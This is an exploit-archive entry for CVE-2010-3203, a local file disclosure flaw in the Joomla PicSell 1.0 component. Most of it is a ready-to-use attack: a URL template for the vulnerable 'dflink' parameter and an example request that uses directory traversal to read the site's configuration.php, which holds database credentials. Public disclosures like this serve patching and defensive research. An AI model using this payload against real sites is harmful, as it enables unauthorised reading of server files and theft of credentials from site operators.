Joomla! Component PicSell 1.0 - Local File Disclosure



EKU-ID: 21234 CVE: CVE-2010-3203;OSVDB-67740 OSVDB-ID:
Author: Craw Published: 2010-08-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Author: Craw
# Email: craw@element7.eu
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications

=======================================================

[+] ExploiT :

 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]


[+] Example :

 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php


=======================================================
Greetz @ LUXEMBOURG
=======================================================